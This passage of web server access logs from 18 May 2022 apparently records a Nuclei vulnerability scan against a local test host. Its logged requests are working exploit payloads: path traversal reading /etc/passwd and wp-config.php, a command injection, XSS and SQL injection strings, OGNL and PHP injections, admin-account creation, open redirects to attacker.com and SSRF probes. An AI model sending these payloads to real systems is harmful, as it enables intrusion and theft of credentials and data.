AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://ca27l3osmpvb3nig07h0ckrgraredmfiu.oast.me/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=Pis2l0&adminpassword=p6Db9K&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"29K6Bdah6V2Oy1r7NxAmpnmovRs","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test\x22) and extractvalue(1,concat(0x7e,md5(1234567890))) -- a HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", 